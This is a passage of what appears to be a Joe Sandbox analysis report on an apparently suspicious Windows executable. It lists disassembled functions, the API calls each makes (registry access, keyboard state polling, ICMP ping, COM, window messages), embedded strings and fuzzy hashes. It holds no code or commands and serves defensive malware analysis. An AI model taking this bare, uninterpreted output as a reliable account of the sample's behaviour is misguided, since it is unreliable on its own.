                        • API ID: ColorLongWindow
                        • String ID:
                        • API String ID: 259745315-0
                        • Opcode ID: 9320c48d443e5b82404dbade91b60119ed4079fa97096230c6f5663ba2c6469e
                        • Instruction ID: cea4c19b6bb1628bbceae7e752306fff377673fdf6d883762f4029431c03b37b
                        • Opcode Fuzzy Hash: 9320c48d443e5b82404dbade91b60119ed4079fa97096230c6f5663ba2c6469e
                        • Instruction Fuzzy Hash: A34185311046409FDB225F3D9C44FBA37E9AB46330F294656F9A68B1E1D731EC42DB10
                        Function 003996E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0037F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00399717
                        • LoadStringW.USER32(00000000,?,0037F7F8,00000001), ref: 00399720
                          • Part of subcall function 00339CB3: _wcslen.LIBCMT ref: 00339CBD
                        • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0037F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00399742
                        • LoadStringW.USER32(00000000,?,0037F7F8,00000001), ref: 00399745
                        • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00399866
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: HandleLoadModuleString$Message_wcslen
                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                        • API String ID: 747408836-2268648507
                        • Opcode ID: a77d6fc594b57b4905aa7d3ea5f24b5626677e96dac756ef37af0ef58e1ca77a
                        • Instruction ID: d8199f90e3e5e1f3f5981dc8fe3aa7bbf71795182e6faa6172313a7aeed73516
                        • Opcode Fuzzy Hash: a77d6fc594b57b4905aa7d3ea5f24b5626677e96dac756ef37af0ef58e1ca77a
                        • Instruction Fuzzy Hash: 76414072904109AACF06FBE4CE86EEE737CAF55340F10406AF6057A092EB756F48CB61
                        Function 003906DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00336B57: _wcslen.LIBCMT ref: 00336B6A
                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 003907A2
                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 003907BE
                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 003907DA
                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00390804
                        • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0039082C
                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00390837
                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0039083C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                        • API String ID: 323675364-22481851
                        • Opcode ID: e57c1433d0dba7a52a9ac717bf690938220e184be316cd02c42104f773c0c76c
                        • Instruction ID: 18d130fdfe1bfb7c468a31f999b82813247d0794c837a29c3d65f25f6f1ac539
                        • Opcode Fuzzy Hash: e57c1433d0dba7a52a9ac717bf690938220e184be316cd02c42104f773c0c76c
                        • Instruction Fuzzy Hash: DD411672D10229AFCF16EBA4DC95DEEB778BF44350F058169E905A7160EB70AE04CBA0
                        Function 003B3C30 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON
                        Download Yara Rule
                        APIs
                        • VariantInit.OLEAUT32(?), ref: 003B3C5C
                        • CoInitialize.OLE32(00000000), ref: 003B3C8A
                        • CoUninitialize.OLE32 ref: 003B3C94
                        • _wcslen.LIBCMT ref: 003B3D2D
                        • GetRunningObjectTable.OLE32(00000000,?), ref: 003B3DB1
                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 003B3ED5
                        • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 003B3F0E
                        • CoGetObject.OLE32(?,00000000,003CFB98,?), ref: 003B3F2D
                        • SetErrorMode.KERNEL32(00000000), ref: 003B3F40
                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 003B3FC4
                        • VariantClear.OLEAUT32(?), ref: 003B3FD8
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                        • String ID:
                        • API String ID: 429561992-0
                        • Opcode ID: a1f1cdc8e3faf352e59a46e82ed33d5fc63a7b0f14f99c76fd91d4e4ffd6cf5e
                        • Instruction ID: 78cd39ea43c748729d74e0037ada10ea9b5b5c83eae1a73bdcefa253f2ea7bc5
                        • Opcode Fuzzy Hash: a1f1cdc8e3faf352e59a46e82ed33d5fc63a7b0f14f99c76fd91d4e4ffd6cf5e
                        • Instruction Fuzzy Hash: 4AC133716083159FD702DF68C88496BBBE9FF89748F14491DFA8A9B610DB30EE05CB52
                        Function 003A7A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
                        Download Yara Rule
                        APIs
                        • CoInitialize.OLE32(00000000), ref: 003A7AF3
                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 003A7B8F
                        • SHGetDesktopFolder.SHELL32(?), ref: 003A7BA3
                        • CoCreateInstance.OLE32(003CFD08,00000000,00000001,003F6E6C,?), ref: 003A7BEF
                        • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 003A7C74
                        • CoTaskMemFree.OLE32(?,?), ref: 003A7CCC
                        • SHBrowseForFolderW.SHELL32(?), ref: 003A7D57
                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 003A7D7A
                        • CoTaskMemFree.OLE32(00000000), ref: 003A7D81
                        • CoTaskMemFree.OLE32(00000000), ref: 003A7DD6
                        • CoUninitialize.OLE32 ref: 003A7DDC
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                        • String ID:
                        • API String ID: 2762341140-0
                        • Opcode ID: cba3aa71db2b0135ac81aeb917474b251eae56e4660ab35ffaeca5ec3a69dfb4
                        • Instruction ID: 8e061cccada9b1a6df678ac32e7a08089a3db931223882e89ea4a05acd496960
                        • Opcode Fuzzy Hash: cba3aa71db2b0135ac81aeb917474b251eae56e4660ab35ffaeca5ec3a69dfb4
                        • Instruction Fuzzy Hash: A0C11975A04209AFDB15DF64C8C8DAEBBB9FF49314F148499E81ADB261DB30ED41CB90
                        Function 003C541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 003C5504
                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003C5515
                        • CharNextW.USER32(00000158), ref: 003C5544
                        • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 003C5585
                        • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 003C559B
                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003C55AC
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: MessageSend$CharNext
                        • String ID:
                        • API String ID: 1350042424-0
                        • Opcode ID: f21112e81912598c437ed54f0767f0a3d534810b190190dca693c82580fb77c0
                        • Instruction ID: 626ba5d3d33078b0fa81ff6e589171cba67c51633fc7029a6b8baa7bfa8fd69c
                        • Opcode Fuzzy Hash: f21112e81912598c437ed54f0767f0a3d534810b190190dca693c82580fb77c0
                        • Instruction Fuzzy Hash: 64619C31904608ABDF129F55CC84EFE7BBDEB0A321F148149F925EA291D774AEC0DB60
                        Function 0038FA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
                        Download Yara Rule
                        APIs
                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0038FAAF
                        • SafeArrayAllocData.OLEAUT32(?), ref: 0038FB08
                        • VariantInit.OLEAUT32(?), ref: 0038FB1A
                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 0038FB3A
                        • VariantCopy.OLEAUT32(?,?), ref: 0038FB8D
                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 0038FBA1
                        • VariantClear.OLEAUT32(?), ref: 0038FBB6
                        • SafeArrayDestroyData.OLEAUT32(?), ref: 0038FBC3
                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0038FBCC
                        • VariantClear.OLEAUT32(?), ref: 0038FBDE
                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0038FBE9
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                        • String ID:
                        • API String ID: 2706829360-0
                        • Opcode ID: fea73892ba9267a2ac5d0ae0923b9df779f6ee6516a61563f6f1157ac6b67fc6
                        • Instruction ID: a8036d78228577713be62477fbfec92dc105e5df2a0807285849826922621b11
                        • Opcode Fuzzy Hash: fea73892ba9267a2ac5d0ae0923b9df779f6ee6516a61563f6f1157ac6b67fc6
                        • Instruction Fuzzy Hash: FF414035A102199FCF06EF65C854DAEBBB9FF48354F008069E94AEB261DB34A945CF90
                        Function 00399C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                        Download Yara Rule
                        APIs
                        • GetKeyboardState.USER32(?), ref: 00399CA1
                        • GetAsyncKeyState.USER32(000000A0), ref: 00399D22
                        • GetKeyState.USER32(000000A0), ref: 00399D3D
                        • GetAsyncKeyState.USER32(000000A1), ref: 00399D57
                        • GetKeyState.USER32(000000A1), ref: 00399D6C
                        • GetAsyncKeyState.USER32(00000011), ref: 00399D84
                        • GetKeyState.USER32(00000011), ref: 00399D96
                        • GetAsyncKeyState.USER32(00000012), ref: 00399DAE
                        • GetKeyState.USER32(00000012), ref: 00399DC0
                        • GetAsyncKeyState.USER32(0000005B), ref: 00399DD8
                        • GetKeyState.USER32(0000005B), ref: 00399DEA
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: State$Async$Keyboard
                        • String ID:
                        • API String ID: 541375521-0
                        • Opcode ID: b98c7967782f442c2b3fded549523d997c5d185dd8961d8226728cbadfeea2cf
                        • Instruction ID: 2b3450c2721d428efbef5f0b450f49eb4270e5d2071ee807e3c20b32c77d21a1
                        • Opcode Fuzzy Hash: b98c7967782f442c2b3fded549523d997c5d185dd8961d8226728cbadfeea2cf
                        • Instruction Fuzzy Hash: 7E41E7349047C96DFF33876988447B5BEA06F12344F09805FDAC6565C2EBA5ADC8CBA2
                        Function 003B055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON
                        Download Yara Rule
                        APIs
                        • WSAStartup.WSOCK32(00000101,?), ref: 003B05BC
                        • inet_addr.WSOCK32(?), ref: 003B061C
                        • gethostbyname.WSOCK32(?), ref: 003B0628
                        • IcmpCreateFile.IPHLPAPI ref: 003B0636
                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 003B06C6
                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 003B06E5
                        • IcmpCloseHandle.IPHLPAPI(?), ref: 003B07B9
                        • WSACleanup.WSOCK32 ref: 003B07BF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                        • String ID: Ping
                        • API String ID: 1028309954-2246546115
                        • Opcode ID: f48b625623c4af0d2e459b1038de70fac2aa130328f0188bccee5651afca8417
                        • Instruction ID: 6d2aa10958ee4f5f17ef04fcb883f46f0e2eb050c562e85890404565c9fdad84
                        • Opcode Fuzzy Hash: f48b625623c4af0d2e459b1038de70fac2aa130328f0188bccee5651afca8417
                        • Instruction Fuzzy Hash: 86918C356082019FD326DF15C889F5ABBE4EF44318F1985A9E5698FAA2CB30FD41CF81
                        Function 003B8CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: _wcslen$BuffCharLower
                        • String ID: cdecl$none$stdcall$winapi
                        • API String ID: 707087890-567219261
                        • Opcode ID: 675da58a37a4f1bef0f6adae3d0e05855f85c38f3ccac47b0b06820331407fe0
                        • Instruction ID: a85944c476fdbb752786f7c2737a2d5d6162752842f0496ea8cc5f1a2fb298aa
                        • Opcode Fuzzy Hash: 675da58a37a4f1bef0f6adae3d0e05855f85c38f3ccac47b0b06820331407fe0
                        • Instruction Fuzzy Hash: 5551A431A041169BCF16DF6CC9519FEB7A9BF64328B21422AEA56EB6C4DB30DD40C790
                        Function 003B372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON
                        Download Yara Rule
                        APIs
                        • CoInitialize.OLE32 ref: 003B3774
                        • CoUninitialize.OLE32 ref: 003B377F
                        • CoCreateInstance.OLE32(?,00000000,00000017,003CFB78,?), ref: 003B37D9
                        • IIDFromString.OLE32(?,?), ref: 003B384C
                        • VariantInit.OLEAUT32(?), ref: 003B38E4
                        • VariantClear.OLEAUT32(?), ref: 003B3936
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                        • API String ID: 636576611-1287834457
                        • Opcode ID: 076d3837bfee40486de8570c1594f0feef11b94e7e96f48608fae46fcebeadd9
                        • Instruction ID: 6c2145bdeead7718e51a84abba2150945bef5494e42ae324d084d3358f3a7efd
                        • Opcode Fuzzy Hash: 076d3837bfee40486de8570c1594f0feef11b94e7e96f48608fae46fcebeadd9
                        • Instruction Fuzzy Hash: 7961B171608321AFD712DF54C889FAAB7E8EF49718F004809F685DB691D770EE48CB92
                        Function 003C8B02 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 149windowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00349BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00349BB2
                          • Part of subcall function 0034912D: GetCursorPos.USER32(?), ref: 00349141
                          • Part of subcall function 0034912D: ScreenToClient.USER32(00000000,?), ref: 0034915E
                          • Part of subcall function 0034912D: GetAsyncKeyState.USER32(00000001), ref: 00349183
                          • Part of subcall function 0034912D: GetAsyncKeyState.USER32(00000002), ref: 0034919D
                        • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 003C8B6B
                        • ImageList_EndDrag.COMCTL32 ref: 003C8B71
                        • ReleaseCapture.USER32 ref: 003C8B77
                        • SetWindowTextW.USER32(?,00000000), ref: 003C8C12
                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 003C8C25
                        • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 003C8CFF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                        • String ID: @GUI_DRAGFILE$@GUI_DROPID$p#@
                        • API String ID: 1924731296-173764029
                        • Opcode ID: 5beb9f65328268c44cbe41f2893802623e9ebc881f1d8812416f45189a330f97
                        • Instruction ID: c12e06f26dbef3d3ebae04ea9392cfc7e8f5530fead4e9ee5b96408c1d51cb87
                        • Opcode Fuzzy Hash: 5beb9f65328268c44cbe41f2893802623e9ebc881f1d8812416f45189a330f97
                        • Instruction Fuzzy Hash: 62515B71104304AFD706EF24D995FAA77E4FB88714F00062DF956AB2E1CB71AE44CB62
                        Function 003A3388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON
                        Download Yara Rule
                        APIs
                        • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 003A33CF
                          • Part of subcall function 00339CB3: _wcslen.LIBCMT ref: 00339CBD
                        • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 003A33F0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: LoadString$_wcslen
                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                        • API String ID: 4099089115-3080491070
                        • Opcode ID: 065efaeebd0c1db42549896b97385dad9f45ab479c69129533afb7bf4def65ff
                        • Instruction ID: 94d66acb8dfe47d23b566a440513900d68ccecd0b59de5942d836da1b91f7433
                        • Opcode Fuzzy Hash: 065efaeebd0c1db42549896b97385dad9f45ab479c69129533afb7bf4def65ff
                        • Instruction Fuzzy Hash: 11518F72D00209AADF17EBA0CD86EEEB778EF05340F108166F5057A062EB716F58DB60
                        Function 0039B5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: _wcslen$BuffCharUpper
                        • String ID: APPEND$EXISTS$KEYS$REMOVE
                        • API String ID: 1256254125-769500911
                        • Opcode ID: ade565452ec94c7356d9eebce60abb4553e05a29da88626a4a516b345ad0bbb1
                        • Instruction ID: 96d3b64e85b544d0daae8fc646399a6cb80f3c916a0e808293005defd1b34887
                        • Opcode Fuzzy Hash: ade565452ec94c7356d9eebce60abb4553e05a29da88626a4a516b345ad0bbb1
                        • Instruction Fuzzy Hash: 7D41F832A000279BCF116F7DDE915BEF7A5AFA0754B264229E461DB284E731ED81C790
                        Function 003A5393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON
                        Download Yara Rule
                        APIs
                        • SetErrorMode.KERNEL32(00000001), ref: 003A53A0
                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 003A5416
                        • GetLastError.KERNEL32 ref: 003A5420
                        • SetErrorMode.KERNEL32(00000000,READY), ref: 003A54A7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Error$Mode$DiskFreeLastSpace
                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                        • API String ID: 4194297153-14809454
                        • Opcode ID: ac2a2c96f2756d6f2e4d7d95ac0d67541d44cf8a6d3ca421f8e07bde624a7034
                        • Instruction ID: 2056a1371d0bfa673f0b16fafd0cc8533d71c99014063813e573572eb57ca595
                        • Opcode Fuzzy Hash: ac2a2c96f2756d6f2e4d7d95ac0d67541d44cf8a6d3ca421f8e07bde624a7034
                        • Instruction Fuzzy Hash: A631D335A00604DFC712DF6AC485EA97BB8EF1A305F188055E505CF652DB74ED82CB90
                        Function 003C3C46 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                        Download Yara Rule
                        APIs
                        • CreateMenu.USER32 ref: 003C3C79
                        • SetMenu.USER32(?,00000000), ref: 003C3C88
                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003C3D10
                        • IsMenu.USER32(?), ref: 003C3D24
